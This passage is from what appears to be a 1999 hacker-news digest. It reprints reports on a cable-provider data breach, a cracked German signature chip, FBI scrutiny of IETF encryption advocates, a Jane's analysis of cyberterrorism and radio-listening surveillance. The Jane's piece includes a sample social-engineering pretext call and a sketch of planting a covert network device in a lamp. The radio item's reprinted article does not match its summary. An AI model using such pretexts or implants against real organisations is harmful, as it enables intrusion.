      be brought in to do a full security audit, Delisle said.

      About a dozen angry customers called the Free Press yesterday, most 
      wanting to know why Videon didn't tell anyone what had happened -- 
      including the police -- until yesterday, more than two weeks after they 
      found out the information was taken.

      While passwords can be quickly changed, other information like addresses 
      and phone numbers are also being passed around, leaving people vulnerable.

      One woman, who asked not to be identified, said she is outraged that she 
      was not told her information had been downloaded.

      "Anyone with a computer may be able to get my name and phone number, and 
      address," she said. "My daughter won't be playing outside alone anytime 
      soon, because now I won't know if some pervert has gotten my address and 
      is lurking around my house." 

      The woman said she is considering cancelling her account.

      Delisle said that in retrospect the decision to keep the incident quiet 
      may not have been the right one.

      "We're still piecing together all the details of what happened," she said. 
      "The important thing is that this does not happen again."

      Videon will set up a Web site to help customers at www.videon.ca/secure 
      and also plans to take out ads in Winnipeg newspapers to explain what 
      happened. 

      Videon customers have set up at least one other site with instructions on 
      changing passwords. After being on-line for only 90 minutes, the site had 
      29 hits.
      
      @HWA
      
14.0  German Digital Signature Chip Broke 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by cripto 
      After months of intense lobbying for a secure system
      and only days after being ratified by the European Union
      the German Digital Signature has been broken. The
      digital signature card, developed by Siemens, is to be
      used in cashless payment systems and access control
      systems. With data dumps of the SLC44/66 chip and
      information explaining its design floating around the
      Internet anyone using the so-called Geldkarte system
      stands the risk of having money transferred without
      their knowing it. 

      The UK Register       
      http://www.theregister.co.uk/991201-000021.html
      
      Posted 01/12/99 4:19pm by Mike Magee

      Siemens German digital signature chip hacked

      Hackers have succeeded in cracking the Siemens digital signature card used in
      cashless payment systems and access control systems across the country. 
    
      The German Digital Signature was ratified by the European Union only a few days
      ago, after intense lobbying for a secure system for transactions. 
    
      The serious breach of security means that anyone using the so-called Geldkarte
      system stands the risk of having money transferred without their knowing it. 
    
      A dissasembled dump of the SLC44/66 chipcard CPU in TeX, along with two pages
      of German text explaining the design has been available on bulletin boards for some
      time, according to the source. 
    
      The dump is currently being re-engineered and commented, according to a source,
      and the knowledge gained has already been used to get hold of Telesec private keys.
       
      
      @HWA

15.0  IETF Members Under Investigation For Treason 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Some members of the Internet Engineering Task Force
      seem to be under investigation by the DOJ and FBI. The
      reason for the investigations seems to be the desire to
      include encryption and exclude back door capabilities in
      new protocols proposed by the IETF. The investigations
      are centered around treason charges. 

      NT Security
      http://www.ntsecurity.net/go/2c.asp?f=/news.asp?IDF=186&TB=news
      
      ZD Net      
      http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2398590,00.html
      
      Crypto Advocate Under FBI Investigation

      Tuesday, November 30, 1999 - We recently published a story
      regarding cryptography and IPv6, where somseone at the
      Department of Justice accused Scott Bradner, Internet Engineering
      Task Force (IETF) area coordinator, of an anti-social act by trying to
      get encryption inserted into the new protocol. Later, at an IETF
      meeting where votes were taken for IPv6 encryption inclusion, Fore
      System's Brian Rosen brazenly claimed that regardless of any
      encryption inclusion, Fore systems would proceed by including back
      doors into any included encryption technology. But the harrassment
      of the IETF doesn't stop there.

      Just how far will our federal government go towards controlling
      strong encryption? Apparently, very far. And this isn't a new effort
      by any means. We learned that William Allen Simpson, a
      Detroit-based computer consultant who was on the IETF staff, has
      been investigated by the federal government for treason charges.
      Simpson was the person that argued loudly for encryption to be
      included in the PPP protocol when it was still in design phases. That
      push landed Simpson in hot whatever with federal officials. Simpson
      learned through friends that he was under investigation for treason
      -- the FBI had been interviewing his friends and associates.

      Simpson obtained 54 pages of documents from the government under
      the Freedom of Information act, however the documents were
      heavily censored, including the bureau's basis for the investigation.
      According to a ZDTV report, Simpson did learn that the FBI had
      accused him of "challenging authority and laws that may impinge
      upon his activities."

      Wait a second! Isn't that part of what the Constitution is all
      about--the means to peacefully object to the laws of the land? I
      think so. And if that's true, then that certainly positions the FBI in a
      bad light since it would appear their actions are counter to the
      Consitutional rights. It not against the law to develop strong
      cryptography, but it is against the law to export that technology
      outside of proper governmental controls. The PPP protocol did not
      have encryption at the time--it was only a suggested inclusion--so
      why investigate a person for doing something completely legal?

      The IETF is an open public standards body that conducts its business
      in clear public view. They help stear standards that better ensure
      compatibility and interoperability. So why would the FBI investigate
      an IETF member just because that person suggested in a public
      meeting that strong encryption be included in a standard
      wide-spread protocol such as PPP?
      
      ZDnet;
      
      The New Crypto-Commies

      Could arguing for strong encryption be
      the next 'un-American activity' that
      justifies blacklists and secret FBI
      investigations?
      By Kevin Poulsen  November 24, 1999 

      Newly released documents show that the
      FBI closely monitored a key member of the
      standard-setting Internet Engineering
      Task Force (IETF) in 1992 and 1993, as
      he waged a doomed battle to inject
      crypto support into an emerging critical
      Internet standard. 

      William Allen Simpson, a Detroit-based
      computer consultant, was  on the IETF.
      The team was developing the "Point to Point
      Protocol" (PPP), designed to
      facilitate Internet access over dial-up
      modems. Simpson was making waves in
      the PPP Working Group by loudly arguing
      for inclusion of crypto support in the
      protocol, which today is used by the vast
      majority of home Internet users to go
      online. 

      In 1993, Simpson learned from a family
      member and colleagues that his efforts
      had drawn the FBI's interest. As he recalls
      it, the bureau was accusing him of a
      capital offense. 

      "Two guys came up to me at a meeting,"
      Simpson recalls. "They said, 'Bill, I was
      interviewed for a treason investigation by
      the FBI'." 

      "Bill was advocating encryption for
      authentication and for privacy in
      standardized Internet protocols," recalls
      Electronic Frontier Foundation cofounder
      John Gilmore, who heard of the
      investigation and suggested that Simpson
      request his FBI file under the Freedom of
      Information Act. 

      "He's kind of an iconoclast," Gilmore told
      me. "He follows his own way and
      sometimes it pisses people off, but it can
      be an advantage when you're faced with
      a Kafkaesque investigation by the
      government. He has the tenacity to stick
      with it until he finds the truth." 

      After six years of wrangling, Simpson
      finally pried 54 pages from the grasping
      hands of the domestic spies last
      Wednesday, only to find that the
      documents were heavily censored. 
      
      @HWA
      
16.0  Jane's Releases Cyberterrorism Report 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by turtlex 
      Jane's Information Group has released its much
      anticipated report on cyberterrorism. While the actual
      information in the article seems rudimentary and crude
      its conclusions about the possibility of a full out terrorist
      attack over the internet being extremely remote seem
      dead on. (Warning this is an extremely long and dry
      article that presents litte new information.) 

      Jane's Defense Weekly        
      http://jir.janes.com/sample/jir0525.html
      
      
      Cyberterrorism hype 
      
      With the 1990s propensity to dot.com everything that moves, 'hacking' and
      'cyberterrorism' have become subjects of intense media coverage. Almost daily,
      hitherto unknown security specialists warn of potential catastrophes: news that
      gets picked up by the media and crosses the globe with impunity. Johan J
      Ingles-le Nobel discussed the subject with programmers at Slashdot to profile
      so-called cyberterrorists and examine the viability of cyberwarfare. 
      
                      Cyberterrorism is a buzzword of 1999. Indeed, with the
                      remarkable growth of the Internet, hacking horror stories
                      have reached new heights of publicity, leading to a veritable
                      media frenzy. Yet careful examination of the issue reveals
                      much of the threat to be unsubstantiated rumour and media
                      exaggeration. The exaggeration is understandable, however
      - these technologies underpin our entire society, and what paper can resist
      printing a scoop revealing that banks are being blackmailed with threats of
      attacks on their computers, or that a military satellite has been hijacked by
      hackers? The idea that an anonymous teenager working alone from his bedroom
      can wreak electronic havoc on the far side of the world makes for good press. 
      
      What is a hacker? 
      
      Nothing gets a hacker's back up quicker than someone confusing a hacker with
      cracker. The term 'hacker' refers to an individual who programmes
      enthusiastically (even obsessively), enjoys programming or is especially good at
      programming; a 'cracker' is somebody who breaks into another's computer
      systems or digs into their code (to make a copy-protected programme run). Yet
      the boundaries have become somewhat blurred and the popular understanding of
      these terms is is quite wrong: ever since Hollywood produced 'Wargames', based
      on Kevin Mitnic's cracking activities (known as 'exploits'), the term 'hacking' has
      become synonymous with unauthorised access into restricted systems - which
      is 'cracking'. In today's world, such activity also includes the deliberate
      defacement of websites. Hackers are quick to point out that there is a code of
      hacker ethics that precludes any profit from the activity - the only motive is the
      activity itself - but they are not nave: realising the potential for misuse, they
      divide themselves into 'white-hat' hackers (ethical hackers) and 'black-hat'
      hackers (crackers). 
      
      According to hackers, 99% of cracking incidents can be blamed on so-called
      'script-kiddies'. These are usually young people who manage to acquire some
      'cracking tools' somewhere on the Internet and are keen try them. They choose a
      'cool' target (such as NASA, the Pentagon or the White House) and launch the
      tools. Older, more established 
      
      hackers see them as upstarts. Think of a kid walking down a corridor
      testing doorknobs; whilst they are more than capable of defacing
      websites such as that of the Central Intelligence Agency (CIA), their
      actions are seen as the equivalent of putting down a whoopie cushion
      on the chair of the UN Secretary General - juvenile, noisy and
      somewhat embarrassing, but ultimately without real effect. Says Mick
      Morgan, webmaster to the UK's Queen Elizabeth: "I have nightmares about
      waking up to find graffiti (which is all it is) on one of my customer's sites." 
      
      However, even minor exploits illustrate one of the many paradoxes facing
      computer security. Specific websites, intended for the computer systems
      administrators and webmaster audiences, monitor the security vulnerabilities
      (bugs) in software that allow exploits to take place. The purpose of these
      websites is to distribute the corrective programming 'patches' that rectify the
      bugs. However, such sites are open to the public and are therefore the ideal
      place for crackers to discover new cracks. The result of this is that the vast
      majority of methods used by crackers to break into sites are known and there
      are patches available. This means that many believe the responsibility for
      security breaches lies not with the software supplier but with the company that
      owns and operates the system. Thus, if a company suffers a security breach,
      that highlights its own negligence or incompetence, which, along with the bad
      publicity associated with intrusions, makes it unsurprising that many companies
      are reluctant to publicise security breaches of their systems. This is especially
      true of the financial sector: there have been rumours for several years that banks
      have been blackmailed by hackers; confirmation has never been forthcoming. 
      
      Cracker profile 
      
      Global estimates vary, but a JIR extrapolation based on mid-1990 estimates by
      Bruce Sterling, author of The Hacker Crackdown: Law and Disorder on the
      Electronic Frontier, puts the total number of hackers at about 100,000, of which
      10,000 are dedicated and obsessed computer enthusiasts. A group of 2501,000
      are in the so-called hacker 'lite', skilled enough to penetrate corporate systems
      and to unnerve corporate security. Given the huge number of people working as
      programmers for the online economy (the technical side of which requires much
      the same skills as those required by a hacker), the totals are sure to rise.
      According to the Center for Research on Electronic Commerce at the University
      of Texas, in 1998 the Internet economy was worth US$301.4 billion, providing 1.2
      million jobs in the USA alone. 
      
      The minimum skill-set needed to be a 'script-kiddy' is simply the ability to read
      English and follow directions. Indeed, much can be gleaned from books or
      documents and mailing lists online such as 'L0pht' bulletins and 'Phrack', whilst
      exploits can be learned from websites such as 'bugtraq', 'rootshell' or
      'packetstorm'. In fact, virus-writing and exploit code is common, and some is
      even automated. 
      
                However, to launch a sophisticated attack against a hardened
                target requires three to four years of practice in C, C++, Perl and
                Java (computer languages), general UNIX and NT systems
                administration (types of computer platform), LAN/WAN
                theory,remote access and common security protocols (network
                skills) and a lot of free time. On top of these technical nuts and
      bolts, there are certain skills that must be acquired within the cracker
      community. 
      
      'Hi, I'm Cheryl, I'm new in IT support. I'm having trouble with the modem bank.
      Can you check the modem to make sure it's turned on? Also, can I have the
      number to make sure I'm using the right one?' Of course, being a diligent and
      helpful worker, the recipient of such a call may be only too happy to help. 
      
      Tools of the trade 
      
      The cracker skillset is more common in highly educated individuals taught in the
      USA and Western Europe, although anyone with enough intelligence and time
      can pick it up without formal schooling. In fact, the skills are not at all rare or
      unusual, being the same as those required for an average, small or
      medium-sized company network system administrator: a position which
      commands among the lowest pay in the computer industry. The chances are
      that there is a university drop-out in your town with all of these prerequisites. That
      said, a list of qualifications does not fully explain their make-up, as the skillset is
      more to do with lifestyle than specific capabilities. Some people collect baseball
      cards; others analyse [computer network] protocols. 
      
      Attacks happen in various guises, from the simple and automated to the highly
      disguised and sophisticated. Crackers also write their own tools, which are
      disseminated in the underground. Certain system diagnostic tools and other
      cracker script tools can significantly automate the process of cracking less
      secure systems. At the low end of the sophistication scale there are activism
      websites, such as 'Floodnet', which hold web-page functionality that automates
      the process of reloading another website's pages in an attempt to make the
      system 'overheat' so that it ceases to work. This is a form of the most common
      exploit, Denial of Service (DoS), which comes in many forms. It is most common
      due to webmasters and web server administrators creating poorly written
      Common Gateway Interface (CGI) scripts (website programming). Exploiting the
      poorly written code is no great feat. In the words of one hacker: "Any punk kid
      could do this to any organisation without any trouble whatsoever." 
      
      Computer specialists suggest that, while annoying, such unsophisticated DoS
      attacks have a hidden danger: they could mask the use of specialist software
      custom-written by an lite cracker amid the noise of the barrage of multiple
      automated attacks. Other tools exist that are designed by the hacker
      community, such as BO2000, which was specifically created to embarrass
      Microsoft's Windows NT security. In fact, the size of the black market in software
      (computer programmes) is enormous. Not only can exploit tools be procured in
      this manner, but they can easily be found online. 
      
      Social engineering 
      
      Social engineering is a term describing the process whereby crackers engineer a
      social situation that allows any potential cracker to obtain access to an
      otherwise closed network. This access could either be permanent (infiltrating an
      insider into the organisation who enables outside access), or temporary. Indeed,
      the scenario has a stunning simplicity about it: "Hi, I'm Cheryl. I'm new in IT
      support. I'm having trouble with the modem bank. Can you check the modem to
      make sure it's turned on? Also, can I have the number to make sure I'm using the
      right one?" Of course, being a diligent and helpful worker, the recipient of such a
      call is only too happy to help. 
      
      Most previous instances of information technology (IT) security violations have
      been attributable to 'inside jobs', which is why there has been significant
      controversy recently about US concerns hiring foreign programmers to rectify
      Y2K issues. 
      
      Having gained access, a cracker can either install code directly
      into the systems on the spot or add a transmitter device. To
      illustrate a scenario, after gaining access to a facility as cleaning
      staff, the perpetrator could put a small computer, itself connected
      to the main network, into the base of a lamp with an infra-red port
      (network connection) aimed out the window of an office or linked to
      a mobile phone. This gives an active presence on the target network and, more
      importantly, remote access to the device from anywhere within line of sight. In
      commercial environments, the security teams that search for bugs (bugs in the
      classical sense - 'listening devices') with receivers do not generally do infra-red
      profiles of a building; such a device will not transmit unless active, so sweeping
      for it is more difficult than trying to detect a bug that is monitoring audio. 
      
      Cellular modems also work, but are potentially detectable by radio-frequency
      sweeps. However, for corporate espionage it is an easy matter to pre-position
      several such systems and then take advantage of security vulnerabilities to gain
      permanent entry to the system. The phone company makes entry easy if the
      location is near a residential area as a receiving mobile phone just needs to be
      plugged into the network interface (telephone connection) of any house. Such
      attacks are not new, but the scale of machines necessary to realise them is
      down to 4in2 of PC board for an amateur willing to spend a little time shopping in
      the back of a technology magazine. "For less than US$1,000 you could build
      such systems and disguise them as appliances like lamps," said Paul Roberts,
      a US-based information security (INFOSEC) specialist. 
      
      Espionage on other computers by remotely monitoring the electro-magnetic (EM)
      signals they emit whilst in use is possible today, albeit expensive. Figures of
      $35,000 are quoted as estimates for a remote monitoring station in a van, for
      example, although the cost is coming down. "EM snooping technology might
      very well come into the reach of the advanced information security hobbyist or
      the determined criminal in the next five to 10 years," said Markus G Kuhn from
      the Computer Laboratory at Cambridge University in the UK. 
      
      Cracking: methods 
      
      Exploits come mainly in three species: DoS; destruction of information (erasing);
      and corruption of information (spoofing). 
      
      As indicated previously, DoS attacks take the form of overloading the processes
      of the computer hosting the website (the server), which then shuts itself down.
      Recently, a new form of such attacks has become prevalent - the 'distributed
      co-ordinated attack' - in which thousands of servers are used in unison. "It's
      possible to detect the attack, but it is very hard to block it using current
      software," said Thomas Longstaff, senior technical researcher for the Software
      Institute at Carnegie Mellon University. However, a co-ordinated attack to bring
      down a government's or a corporation's computer systems cannot be maintained
      long enough to be little more than a nuisance. Yet while only annoying at the
      moment, as interconnectivity increases and the importance of the online
      economy becomes manifest, such exploits will have serious financial
      implications. That said, recovery from such an attack tends to be fast. 
      
      Erasing is considered very difficult to conduct because any system worth
      attacking is also worth backing up. UK and US interbank transactions are
      backed up daily with multiple remote tapes, so any cracker wanting to destroy
      the interbank market will cause the loss of at most one day's transactions.
      However, this is not without consequence: consumer confidence in the banking
      system might drop to unprecedented levels were exploits to be publicised. 
      
      Viruses are a form of erasure most computer users are familiar with. Indeed, as a
      teenager Robert Morris accidentally launched a virus that shut down most of the
      Unix-based computers in the USA in the 1980s. Much can be said for judging the
      security implications of information technology by the fact that virus protection is
      now standard on any company computer. A good thing too, as 1999's 'Melissa
      virus' was the first of a new generation of Microsoft-targeted viruses that are
      self-replicating by sending themselves forward in an email entitled 'Important
      message from . . .' to the people listed in a person's Outlook Express email
      package without their knowledge. The 'Bubbleboy' virus promises to be worse, as
      you just have to receive it to be affected. Erasing attacks can be guarded against
      through multiple, remote (in both geography and network topology) back-ups,
      taken at sufficient frequency that the maximum possible loss is bearable for the
      system (the 'safe frequency'). Any system for which the safe frequency is too low
      for the defence to be practical (such as a power grid) tends be kept remote from
      networks, although this is not always the case. 
      
      Yet for every solution there is a problem. The effectiveness of back-ups can be
      circumvented by malicious programming that corrupts one random byte in the
      data; even though the back-ups look good, the data is bad. There is no way of
      telling unless the whole tape is recovered to find the one or two data files that
      have changed and examining them 'with a microscope'. The problems are obvious
      if someone had 10 weeks of back-ups, each with different bits of bad data, and
      all the back-ups were infected. There would be no way to know which data was
      good and which was bad. Indeed, if the cracker knows enough about the system
      he/she is attacking, recovery may be impossible. 
      
      Spoofing is much more difficult to guard against. This kind of attack comes in
      two guises: attempts to create phoney records or phoney messages in a system
      (such as creating false bank accounts); or attempts to create phoney
      instructions to the processing system, causing a failure of the system. This is as
      bad as an erasing attack. The easiest way to defend against non-destructive
      spoofing is again to use back-ups and to operate double-entry book-keeping,
      which traces every record to its creation and requires consistency between
      numerous (again, preferably topologically remote) sources. This multiplies the
      difficulty of an attack as the attacker has to break several systems instead of
      just one. By appearing to be a user, however, a cracker could manipulate data or
      corrupt the hardware by installing a virus, for example. While this would not be
      quite like a bomb going off, it could have much worse long-term repercussions. 
      
      The Internet Auditing Project 
      Host count: 36,431,374 
      Vulnerability count: 730,213 
      Vulnerable host count: 450,000 
      
      Destructive spoofing aimed at the processor rather than its records is a different
      matter. Causing the processor to execute phoney instructions could allow an
      attacker to erase records, transmit phoney messages and, potentially, cover
      his/her tracks well enough to escape consistency checks. This kind of attack is
      more difficult than any other - usually the only way to get another machine to
      execute rogue instructions is to exploit 'buffer overflows', overloading the
      temporary data buffer on computers. 
      
      Nightmare scenarios are based on such attacks. "We could wake one morning
      and find a city, or a sector of the country, or the whole country having an electric
      power problem, a transportation problem or a telecommunication problem
      because there was a surprise attack using information warfare,'' claims Richard
      Clarke, the US National Security Council adviser who heads counterterrorism
      efforts. Whilst alarmist, precedents do exist, as evidenced by Gail Thackaray,
      recognised as one of the premier cracker-catchers in the business: "One hacker
      shut down a Massachusetts airport, 911 emergency service and the air traffic
      control system while playing with the municipal phone network, and another
      hacker in Phoenix invaded the computer systems of one of the public energy
      utilities, attaining 'root' level privileges on the system controlling the gates to all
      the water canals from the Grand Canyon south." These examples involved
      individuals rather than organised groups, and none of them were politically
      motivated. 
      
      Cyberterrorism? 
      
      In warfare as well as in business, IT is the great equaliser. Its low financial barrier
      to entry relative to heavy industry allows even the poorest organisations an IT
      effectiveness equal (or nearly equal) to large corporations. 
      
                       The greatest advantage the covert warfare arms of major
                       nation-states (such as the CIA or Mossad) have over small
                       terrorist organisations is the financial wherewithal to
                       develop massive intelligence networks using the best
      equipment. IT levels the playing field in this regard. 
      
      Because sensitive military computers are required to be kept as far away from
      the Internet as possible, unless there was some major oversight or an incidence
      of social engineering, a military system cannot be directly attacked. However,
      there is always a weak link in the chain: for example, an army depends on
      Vendor A for supplies/ equipment, and Vendor A depends on parts from Vendor
      B, and so on. Somewhere in that chain is a vulnerability due to the massive
      networks, technological dependence and just-in-time ordering systems. Indeed,
      although direct attacks on critical infrastructure are unlikely, if on a network that
      has a link into it elsewhere, then one vulnerability is all it takes. Strikes in one
      automotive plant have effectively shut down large car makers. Most US
      automotive plants are also government contractors supplying vehicles and
      replacement parts to the military: an obvious target for planting viruses during
      war. 
      
      Some people collect baseball cards, others analyse protocols 
      
      Cyberterrorism is not only about damaging systems but also about intelligence
      gathering. The intense focus on 'shut-down-the-power-grid' scenarios and tight
      analogies with physically violent techniques ignore other more potentially
      effective uses of IT in terrorist warfare: intelligence-gathering, counter-intelligence
      and disinformation. 
      
      Disinformation is easily spread; rumours get picked up by the media, aided by
      the occasional anonymous e-mail. Cracking into a government server and posting
      a new web page looks impressive and generates publicity, but cracking into a
      government server and reading private email is much more valuable to terrorists.
      This gives cyberterrorists valuable details about the thought and operations of
      their adversaries, and can aid in planning conventional attacks. Furthermore, if
      terrorists can penetrate the security of an enemy organisation's computer
      networks, they do not need to do any damage to be militarily effective. Rather,
      they can quietly copy information to process at their leisure, without having to
      physically smuggle it out of secure facilities. False or misleading information can
      be planted in (or deleted from) databases, undermining the effectiveness of
      organisations relying on that information. In today's environment, authentication
      via strong encryption is still rare and IT makes forgery easy. Credentials can be
      forged to fool authorities or the media for purposes of disinformation or to
      enhance covert physical activities. 
      
      As pointed out by Clifford Stoll in The Cuckoo's Egg, automated 'data mining'
      techniques can be used to search for useful patterns in vast stores of insecure
      and seemingly unrelated data. A bank may assume its electronic fund transfer
      system is the most vital system to protect, but a terrorist may only want access
      to the financial records of persons or groups that are the bank's customers. This
      may not even involve destruction of data, as the pure information is often much
      more valuable than simply destroying random records. Reconnaissance attacks
      such as these are difficult to stop but extremely damaging. In the long-term
      banking scenario, the terrorist may simply choose to track sources of funding
      based on deposit records to harm the person or group who is the target. In a
      situation like this, going into the bank to destroy the information is only a
      temporary setback and will raise attention. Why destroy a valuable point of
      information gathering by doing something short-term like disrupting operations? 
      
      Nevertheless, for the terrorist, cracking might be used for
      more than just destroying data. Attacking an information
      system would be a good way to either distract the target
      or otherwise enable the terrorist to perform a physical
      attack. An example might be to crack into an airline and
      delete transport manifests to cover the transport of illegal
      materials. Had Shoko Asahara and the Aum Shinrikyo group been able to crack
      the Tokyo power system and stop the subways, trapping passengers on the
      trains, the number of casualties caused by their 1995 Sarin gas attack might
      have been significantly larger. If a determined group wanted to bring New York to
      its knees, what better way than to combine a physical bombing campaign with
      simultaneous IT attacks on the power grid, hospitals, emergency services and
      the media? 
      
      Turning to the larger picture, in warfare the party that runs out of funds first loses.
      Thus, the objective of warfare may not just be to inflict as much 
      
                       physical damage as possible, but instead be to maximise
                       financial damage. The Irish Republican Army (IRA) learnt
                       to use this concept very effectively in recent years,
                       sufficiently occupying the resources of the British
                       government through infrastructural attacks (as opposed to
      direct attacks against people). This suggests that, in the future, stock markets or
      other primary financial institutions might become high-profile targets and the
      most effective means of accomplishing a terrorist's goal. More damage would be
      accomplished by taking the New York Stock Exchange offline for a few days
      rather than actually bombing a building. That said, financial institutions are one of
      the few parties recognised in the hacker community for taking their security very
      seriously indeed. 
      
      Given the predominance of the IT-based industry and the familiarity of the Internet
      in the USA and Western Europe, the terrorist groups that fit the motive and
      mindset to use cracking could be closed religious or fanatical groups whose
      value systems are so out of sync with the mainstream that they feel threatened
      enough to take as much of the world with them as they 'go under'. That, together
      with 'lone gunmen' and activism campaigns - 'hacktavism' - are scenarios that
      appear to fit the profile. 
      
      A Pakistani Internet hacker known only as 'Dr Nuker', for example, has a
      message for Americans: he and a cybercohort, one 'Mr Sweet', have not yet
      begun to fight. The idea of Third World cyberpunks threatening the planet's sole
      superpower might seem unlikely - unless, of course, you run Internet sites at
      Lackland AFB or 86 other facilities their group that the 'Pakistan Hackerz Club'
      (PHC), has struck in the past five months. 
      
      The PHC's self-described founder and perhaps the world's most prolific Web
      cracker today, Dr Nuker admits he's a revolutionary, a 'cyberterrorist' with a
      cause: freedom for Indian-controlled Kashmir. Yet by penning anti-Indian
      missives on Internet sites run by the Naval Reserve Maintenance Facility in
      Ingleside, the Karachi Stock Exchange and even the Disney Guide, Dr Nuker not
      only has become a high-profile 'hacktivist' - a computer cracker with a political or
      social goal - but a wild card who hints he can wreak havoc far from home. 
      
      "We don't have any intentions to compromise any sort of military or governmental
      database, but in case there will be a cyber war with Pakistan, then we will sure
      prove our knowledge, ability and skills," he warned in an e-mail message. It may
      be no idle boast. 
      
      Today, employers, even those running critical infrastructure, are hard-pressed to
      not give employees Internet access; 401k retirement plans, health insurance
      plans and others are starting to mandate it. Most employees are on insecure,
      poorly administered, unreliable desktop operating systems: the recipe for serious
      electronic mayhem. 
      
      Beyond the hype 
      
      Critics maintain there is no such thing as cyberterrorism, and there is
      undoubtedly a lot of exaggeration in this field. If your system goes down, it is
      much more interesting to say it was the work of a foreign government rather than
      admit it was due to an American teenage 'script-kiddy' tinkering with a badly
      written CGI script. If the power goes out, people light a candle and wait for it to
      return, but do not feel terrified. If their mobile phones switch off, society does not
      instantly feel under attack. If someone cracks a web site and changes the
      content, terror does not stalk the streets. Some groups talk of taking down power
      grids; while that would help in conjunction with another type of attack, in itself it
      would be useless. Most grids suffer infrequent black-outs anyway that are not
      terrorist-related. In fact, terrorism campaigns using just computers are unlikely.
      The sheer size of programmes works against the attacker more than the
      defender. No one person can fully understand a programme comprising over a
      million lines of code, especially if he/she did not write it, and the defender has
      more people available. Critical programmes that run infrastructure functions, such
      as traffic lights, are usually custom-written, making them twice as difficult to
      attack. 
      
      Any system put together in the last few years will have been implemented with
      security in mind. Ironically, Y2K could prove to be a boon, as audits will give
      detailed reports on exactly what is in a system and this information can be used
      to boost security. 
      
      Most security-aware organisations do not put highly sensitive (such as military or
      corporate) data on servers that are accessible via the Internet and design their
      Internet servers to be disposable and easily reinstalled from compact disc (CD)
      or tape. These organisations also typically keep their servers in restricted-access
      areas. Most organisations with sensitive data also keep off-site back-ups.
      Write-once CDs are becoming very popular as they are inexpensive, compact
      and convenient to restore from. To cause serious and lasting damage, a terrorist
      would need to destroy or corrupt not only the contents of the servers, but also
      the off-site back-ups. 
      
      Reality bytes 
      
      In theory, cyberterrorism is very plausible, yet in reality it is difficult to conduct
      anything beyond simple 'script-kiddy' DoS attacks. Terrorists attempting to sway
      a populace by fear would therefore be less interested in such an attack unless
      they could carry out an extremely damaging one on a repeatable basis or unless
      they used it to augment the effects of a physical attack. 
      
      As things stand, while a terror attack using crackers is potentially highly
      destructive, the psychological impact of the disruption of services is still much
      lower than that of a direct physical attack. 
      
      Johan J Ingles-le Nobel is Deputy Editor of JIR, having previously obtained his
      Masters at St Andrews University. He gratefully thanks the contribution and
      advice of people at Slashdot.org. 
      
      
      @HWA

17.0  Car Radio Listening Habits Being Gathered 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench 
      Think your safe from the prying eyes of the data
      collector when you're peacefully driving your car and
      listening to the radio? Think again. New technology
      being tested in Atlanta, Toronto, Los Angeles and
      Phoenix can remotely determine what radio station you
      are listening to in your car. Small shoebox-size
      electronic sensors posted on billboards and light poles
      can listen to the signal from the oscillator in the car
      radio, determine the frequency and log the information
      in a central database. This information is then made
      available to subscribing radio stations in real time to
      help in determining ratings numbers. (Even though this
      system does not collect demographic data, can't
      collect AM yet, and doesn't listen to homes or
      businesses, it is still scary as hell.) 
      
      The Atlanta Journal Constitution   
      http://www.accessatlanta.com/partners/ajc/newsatlanta/radio/index.html
      
      Getting with the program
      WCNN to debut as issue-oriented
      talk radio geared to Atlanta's
      black audience 
      
      We've got rock, rap,
      country, salsa and
      smooth jazz. But come
      April 3, Atlanta will have
      a new radio format -
      black news/talk. 
      
      That's when Midwestern
      Broadcasting, owner of
      adult R&B station Kiss
      104.7, will take over
      programming of
      WCNN/680 AM from Cox Radio and
      launch a 24-hour news/talk station aimed at
      Atlanta's African-American community. 
      
      According to Midwestern Vice President
      David Dickey, the station will emphasize
      local programs rather than syndicated
      shows, and focus on issues such as
      education, government, health care and the
      economy. 
      
      In the next few weeks, the company will
      announce the station's new name, unveil a
      logo and begin hiring on-air talent. 
      
      The takeover will end WCNN's lineup of
      news/talk shows, including Tom Hughes in
      the morning, the syndicated G. Gordon
      Liddy show at midday and Neal Boortz
      producer Royal Marshall's talk show in the
      afternoon. 
      
      "I don't think Neal [Boortz] or Dr. Laura
      [Schlessinger] are focused on the needs
      and issues of the average
      African-American listener," Dickey said,
      referring to popular programs on news/talk
      stations WSB-AM and WGST-AM/FM. 
      
      "If we are here to serve the black
      community, programming has to originate
      from that community. If you had to pick any
      city in America to support this effort, Atlanta
      is the city to do it." 
      
      According to Arbitron, the company that
      provides radio ratings, 769,000 of Atlanta's
      3 million radio listeners ages 12 and older
      are black. 
      
      As news of the venture trickled into the
      radio community Tuesday, many industry
      observers seemed to believe that a black
      news/talk station would be a savvy addition
      to Atlanta's increasingly competitive and
      lucrative radio market. 
      
      At 50,000 watts in the daytime and 10,000
      watts at night, WCNN is the
      second-strongest AM signal in town,
      behind WSB. 
      
      "Oooh, that's smart," said Star 94 general
      manager Mark Kanov upon hearing the
      news. "A market like Atlanta would certainly
      have a strong core for a station like that. On
      the surface, it seems like it would have a
      very strong appeal." 
      
      "It's what I would do if I owned the station,"
      said Andrew Saltzman, general manager of
      Sportstalk 790/The Zone. "Talk radio is a
      booming format, and that's a
      [demographic] that's not truly being catered
      to. Why shouldn't the urban community have
      full-service talk radio?" 
      
      Black news/talk is not a new idea. The
      format has been successfully adopted by
      WOL in Washington and WLIB in New
      York. But because there was usually only
      one per community, urban radio stations
      have not broken into niche formats as
      quickly as stations geared to white
      audiences. 
      
      For example, V-103, Atlanta's top-rated
      urban station, was the only major FM
      station catering to the African-American
      audience until 1992, when Kiss 104.7
      signed on the air. V-103 morning host
      Frank Ski explained how such exclusivity
      affected the listening habits and
      expectations of the black radio audience. 
      
      "For a long time, the lack of radio stations
      available to minorities meant we didn't
      have a second or third choice when it came
      to radio," Ski said. "That made the black
      community begin to like a whole package
      of things [on one station]. 
      
      We want to hear music, hear something
      funny and be informed. Black talk can be
      good for the market if it's done right. The
      difficulty is that because we haven't really
      had it, there's not a lot of good, available
      talent to do it. They will be competing with
      the white news-talk stations, so they really
      need to have their game together." 
      
      Midwestern Broadcasting, which is owned
      by the Dickey family, has specialized in
